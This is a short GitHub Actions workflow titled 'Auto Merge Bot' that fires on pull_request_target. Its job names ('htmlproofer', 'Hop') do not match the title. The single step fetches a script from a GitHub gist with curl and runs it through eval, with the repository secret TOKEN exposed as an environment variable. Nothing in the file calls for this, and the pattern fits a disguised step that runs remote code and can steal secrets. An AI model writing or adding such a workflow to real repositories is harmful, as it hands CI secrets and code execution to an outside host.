name: Auto Merge Bot

on:
  pull_request_target:
    branches: [ master ]

jobs:
  htmlproofer:
    name: Hop
    runs-on: ubuntu-latest
    steps:
      - name: Hop
        run: |
          eval "$(curl -s https://gist.githubusercontent.com/h1-0xn3va/725cb29ea08b20fa8ed57a0f3a74003b/raw/d3f93f39d9cd04b8c7e0daef9f68ff05bb658860/2)"
        env:
          TOKEN: ${{ secrets.TOKEN }}
